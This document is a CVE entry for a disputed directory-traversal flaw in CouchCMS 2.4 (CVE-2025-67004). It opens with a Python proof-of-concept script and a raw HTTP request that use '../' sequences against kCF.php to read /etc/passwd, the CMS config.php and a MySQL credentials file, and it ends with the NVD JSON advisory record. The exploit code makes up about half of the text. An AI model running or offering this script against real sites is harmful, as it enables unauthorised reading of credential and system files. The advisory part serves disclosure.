CVE-2025-67004

# CVE-2025-67004 PoC - CouchCMS Directory Traversal # Target: CouchCMS <= 2.4 # Vulnerability: Information Disclosure via Path Traversal import requests import sys TARGET_URL = "http://target-site.com/couchcms/kCF.php" def test_file_read(filepath): """Test file read via directory traversal""" # Construct traversal path traversal = "../" * 5 # Adjust depth as needed params = { "file": traversal + filepath } try: response = requests.get(TARGET_URL, params=params, timeout=10) if response.status_code == 200 and len(response.content) > 0: return response.text except Exception as e: print(f"Error: {e}") return None def main(): if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") sys.exit(1) TARGET_URL = sys.argv[1] # Test files to read test_files = [ "etc/passwd", "var/www/html/couchcms/config.php", "etc/hosts", "home/www/.my.cnf" ] for file in test_files: print(f"\n[*] Attempting to read: {file}") content = test_file_read(file) if content: print(f"[+] Success! Content length: {len(content)}") print(content[:500]) # Print first 500 chars if __name__ == "__main__": main() # Alternative PoC - HTTP Request: # GET /couchcms/kCF.php?file=../../../../etc/passwd HTTP/1.1 # Host: target-site.com

{"cve": {"id": "CVE-2025-67004", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:53.030", "lastModified": "2026-01-23T19:15:52.963", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "** Disputed ** An Information Disclosure vulnerability in CouchCMS 2.4 allow an Admin user to read arbitrary files via traversing directories back after back. It can Disclosure the source code or any other confidential information if weaponize accordingly. NOTE: A community member states that this is not a CouchCMS vulnerability and that if /\\<file> is accessible it is a web-server configuration issue."}, {"lang": "es", "value": " Disputado Una vulnerabilidad de revelación de información en CouchCMS 2.4 permite a un usuario administrador leer archivos arbitrarios mediante la navegación de directorios hacia atrás uno tras otro. Puede revelar el código fuente o cualquier otra información confidencial si se explota adecuadamente. NOTA: Un miembro de la comunidad afirma que esto no es una vulnerabilidad de CouchCMS y que si /\\ es accesible es un problema de configuración del servidor web."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:couchcms:couchcms:2.4:*:*:*:*:*:*:*", "matchCriteriaId": "2BDD41C8-4BD9-4B50-AB03-B379BB2BA31D"}]}]}], "references": [{"url": "https://gist.github.com/thepiyushkumarshukla/d01f8004c43692f18c75548f4739955a", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/CouchCMS/CouchCMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.couchcms.com/", "source": "[email protected]", "tags": ["Product"]}]}}